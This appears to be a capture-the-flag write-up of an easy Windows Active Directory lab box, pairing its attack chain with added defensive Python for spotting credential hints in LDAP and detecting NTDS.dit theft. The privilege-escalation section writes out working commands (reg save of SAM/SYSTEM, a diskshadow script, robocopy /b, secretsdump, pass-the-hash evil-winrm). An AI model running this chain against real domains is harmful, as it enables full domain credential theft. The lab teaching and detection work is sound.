Summary
Baby is an Easy Windows AD box with two classic misconfigurations: credentials in
an LDAP description attribute and a user in Backup Operators without
compensating controls. Anonymous LDAP enumeration reveals an “initial password”
hint sitting in plain text in Teresa Bell’s description attribute. The password actually works for Caroline
Robinson (flagged PASSWORD_MUST_CHANGE). After changing it, WinRM as Caroline lands
a shell. Caroline’s SeBackupPrivilege + SeRestorePrivilege allow diskshadow +
robocopy /b to extract NTDS.dit → secretsdump → Administrator NT hash → PtH WinRM.
Flags: captured locally (omitted per writeup policy).
Recon
53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389, 5985 — DC profile.
Domain: baby.vl, Hostname: BabyDC, Server 2022.
Anonymous LDAP allowed.
ldapsearch -x -H ldap://<TARGET> -b 'DC=baby,DC=vl' \
-s sub '(objectClass=user)' sAMAccountName description
# Teresa.Bell description: "Set initial password to <initial-pw>"
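The same check, generalized: parsing the LDIF that ldapsearch prints and flagging every user whose free-text attributes read like a password note. This is an added example for this writeup, not code from the original page or from any tool it uses; the sample LDIF is constructed (the Teresa.Bell entry mirrors the box, the other two accounts and their text are made up), and the keyword list is an assumption you would tune.

```python
"""
Triage LDAP description attributes for credential hints.

Added example for this writeup, not code from the original page or from any
tool it uses. It parses the LDIF that ldapsearch -x prints (folded
continuation lines, base64 '::' values, '#' comments, the trailing
search/result block) and flags user entries whose free-text attributes
mention a password. SAMPLE_LDIF is constructed: the Teresa.Bell entry mirrors
the box's shape; the other two accounts and their text are made up.
"""
import base64
import re

SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=baby,DC=vl> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description
#

# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
sAMAccountName: Teresa.Bell
description: Set initial password to <initial-pw>

# Jane Doe, dev, baby.vl (constructed; '::' means the value is base64)
dn: CN=Jane Doe,OU=dev,DC=baby,DC=vl
sAMAccountName: Jane.Doe
description:: cGFzc3dvcmQgaXMgU3VtbWVyMjAyNA==

# Ian Walker, dev, baby.vl (constructed; folded the way ldapsearch wraps)
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
sAMAccountName: Ian.Walker
description: Dev team lead, on-call rot
 ation owner

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
"""

# attribute[::] value   (two colons mean the value is base64-encoded)
ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?)\s?(.*)$")

# Words that usually mean an admin used the field as a password notepad
# (assumption; extend with your own tenant's vocabulary).
CRED_HINT = re.compile(
    r"\b(pass(word|wd|phrase)?|pwd|credentials?|logon|login)\b", re.I)


def parse_ldif(text):
    """Return one dict per entry (lower-cased attribute -> list of values).

    Only records with a dn survive, which drops ldapsearch's trailing
    'search:'/'result:' status block.
    """
    # Unfold first: a line beginning with one space continues the previous line.
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)

    entries, current = [], {}
    for line in logical + [""]:          # sentinel flushes the last record
        if line == "":
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr.lower(), []).append(value)
    return entries


def find_credential_hints(ldif_text, attrs=("description", "info", "comment")):
    """Return (account, attribute, value) for free-text values that look like
    credential hints. 'info' and 'comment' are other common notepad fields."""
    hits = []
    for entry in parse_ldif(ldif_text):
        who = entry.get("samaccountname", entry["dn"])[0]
        for attr in attrs:
            for value in entry.get(attr, []):
                if CRED_HINT.search(value):
                    hits.append((who, attr, value))
    return hits


if __name__ == "__main__":
    # Real use: ldapsearch -x -H ldap://<TARGET> -b 'DC=baby,DC=vl' \
    #   '(objectClass=user)' sAMAccountName description info comment > users.ldif
    # then pass open('users.ldif').read() instead of SAMPLE_LDIF.
    for account, attr, value in find_credential_hints(SAMPLE_LDIF):
        print(f"{account}: {attr} = {value!r}")
```

Run it against the real dump by redirecting ldapsearch to a file, as the comment in the block shows; the base64 branch matters in practice because any description containing non-ASCII or a leading space is emitted with `::` and would otherwise be missed by a plain grep.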
Foothold — LDAP credential + must-change
netexec smb <TARGET> -u users.txt -p '<initial-pw>' --continue-on-success
# Caroline.Robinson : <initial-pw> [STATUS_PASSWORD_MUST_CHANGE]
smbpasswd -r <TARGET> -U Caroline.Robinson -s <<EOF
<initial-pw>
<new-pw>
<new-pw>
EOF
evil-winrm -i <TARGET> -u Caroline.Robinson -p '<new-pw>'
# user.txt obtained
Privesc — Backup Operators → NTDS
# Caroline is in BUILTIN\Backup Operators
whoami /priv
# SeBackupPrivilege Enabled
# SeRestorePrivilege Enabled
# SeBackupPrivilege also lets reg.exe export the protected hives. SYSTEM holds the
# boot key secretsdump needs to decrypt NTDS.dit; SAM is not needed for NTDS but
# is cheap to grab while here.
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
Diskshadow script, saved as shadow.dsh (CRLF line endings required, writable metadata path required):
set metadata c:\windows\temp\meta.cab
set context persistent nowriters
add volume c: alias bbb
create
expose %bbb% z:
diskshadow.exe /s shadow.dsh
robocopy /b z:\Windows\NTDS C:\Users\Caroline.Robinson\Documents NTDS.dit
Download via smbclient (evil-winrm truncates large files):
smbclient //<TARGET>/c$ -U 'baby.vl/Caroline.Robinson%<new-pw>' \
-c "get Users\\Caroline.Robinson\\Documents\\NTDS.dit ./NTDS.dit"
smbclient //<TARGET>/c$ -U 'baby.vl/Caroline.Robinson%<new-pw>' \
-c "get Users\\Caroline.Robinson\\Documents\\system ./system"
secretsdump.py -ntds NTDS.dit -system system LOCAL
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:<NT-hash>:::
evil-winrm -i <TARGET> -u Administrator -H '<NT-hash>'
# root.txt obtained
Why each step worked
- LDAP description: free-form text field exposed anonymously; admins use it as a notepad.
- PASSWORD_MUST_CHANGE: smbpasswd -r can change a must-change password over SAMR without a prior valid session, so the flag is not a barrier to an attacker who already holds the old password.
- SeBackupPrivilege: bypasses ACLs for file reads; designed for backup software, exploitable for NTDS extraction.
- diskshadow: creates a VSS snapshot so the in-use, locked NTDS.dit can be copied; the script needs CRLF line endings and a writable SET METADATA path (C:\Windows\Temp works). robocopy /b then reads from the exposed snapshot in backup mode.
- evil-winrm download truncation: large files (>~10MB) should be retrieved via smbclient instead.
Counterfactuals
- Never store credentials in LDAP description attributes.
- Provisioning workflows should force password change on first login via managed tooling, not leave accounts in PASSWORD_MUST_CHANGE state indefinitely.
- Backup Operators should be near-empty and its membership audited; Protected Users hardens those accounts against credential theft but does not remove the backup privilege, so log and review NTDS access patterns as well.
- Alert on diskshadow.exe and robocopy /b invocations on DCs.
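What those alerts look like in practice, as an added example for this writeup (not code from the original page or from any vendor rule set): a few process-creation rules run over constructed Windows Security 4688 records that replay the privesc chain above, plus benign noise they must ignore. The record field names and the DOMAIN_CONTROLLERS inventory are assumptions chosen for the example; map your SIEM's schema onto them.

```python
"""
Detection logic for the Backup Operators -> NTDS.dit chain used above.

Added example for this writeup, not code from the original page or any
product's rule set. It runs process-creation rules over constructed
Windows Security 4688 records (the dict shape is an assumption chosen for
the example). Alerts fire only on domain controllers, because scripted
diskshadow and backup-mode robocopy are routine on file servers but not
on a DC, and the chain is correlated per actor so the whole sequence
stands out from a single odd command.
"""

DOMAIN_CONTROLLERS = {"BABYDC"}          # assumption: inventory of DC hostnames

# Constructed 4688-style events: the first three reproduce the privesc chain,
# the last two are benign noise the rules should ignore.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "BABYDC", "SubjectUserName": "Caroline.Robinson",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SYSTEM system"},
    {"EventID": 4688, "Computer": "BABYDC", "SubjectUserName": "Caroline.Robinson",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s shadow.dsh"},
    {"EventID": 4688, "Computer": "BABYDC", "SubjectUserName": "Caroline.Robinson",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b z:\Windows\NTDS C:\Users\Caroline.Robinson\Documents NTDS.dit"},
    {"EventID": 4688, "Computer": "BABYDC", "SubjectUserName": "BABYDC$",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy C:\Scripts \\fs01\backup\scripts /MIR"},
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "Ian.Walker",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b D:\data E:\data /E"},
]


def _args(cmdline):
    """Lower-cased whitespace tokens; enough for the switches examined here."""
    return [t.strip('"').lower() for t in cmdline.split()]


def _exe(event):
    """Image file name without its directory, lower-cased."""
    return event["NewProcessName"].rsplit("\\", 1)[-1].lower()


def rule_diskshadow_script(ev):
    # Scripted diskshadow (/s): how a non-interactive attacker shell drives
    # VSS snapshot creation and exposure.
    return _exe(ev) == "diskshadow.exe" and "/s" in _args(ev["CommandLine"])


def rule_robocopy_backup_mode(ev):
    # /b and /zb make robocopy open files with SeBackupPrivilege, which is
    # what lets a Backup Operator read NTDS.dit regardless of its ACL.
    return _exe(ev) == "robocopy.exe" and bool({"/b", "/zb"} & set(_args(ev["CommandLine"])))


def rule_hive_export(ev):
    # reg save of the SYSTEM (boot key), SAM or SECURITY hive.
    a = _args(ev["CommandLine"])
    if _exe(ev) != "reg.exe" or len(a) < 3 or a[1] != "save":
        return False
    key = a[2].replace("hkey_local_machine", "hklm")
    return key in {r"hklm\system", r"hklm\sam", r"hklm\security"}


def rule_ntds_reference(ev):
    # Any command line on a DC that names the directory database file.
    return "ntds.dit" in ev["CommandLine"].lower()


RULES = [rule_diskshadow_script, rule_robocopy_backup_mode,
         rule_hive_export, rule_ntds_reference]


def evaluate(events, dcs=DOMAIN_CONTROLLERS):
    """Return (Computer, user, rule name, CommandLine) for every rule hit on a DC."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4688 or ev["Computer"].upper() not in dcs:
            continue
        for rule in RULES:
            if rule(ev):
                alerts.append((ev["Computer"], ev["SubjectUserName"],
                               rule.__name__, ev["CommandLine"]))
    return alerts


def correlate(alerts, min_rules=2):
    """Group alerts by (host, user) and keep actors that tripped at least
    min_rules distinct rules: the chain, not an isolated admin command."""
    by_actor = {}
    for host, user, rule, _ in alerts:
        by_actor.setdefault((host, user), set()).add(rule)
    return {k: sorted(v) for k, v in by_actor.items() if len(v) >= min_rules}


if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for host, user, rule, cmd in hits:
        print(f"[{host}] {user}: {rule}: {cmd}")
    for (host, user), rules in correlate(hits).items():
        print(f"CHAIN on {host} by {user}: {', '.join(rules)}")
```

The per-actor correlation is the part worth keeping even if the individual rules are noisy in your environment: a legitimate backup job on a DC may trip one of them, but a single non-service account exporting the SYSTEM hive, scripting diskshadow and copying NTDS.dit in backup mode within one session is the exact pattern this box demonstrates.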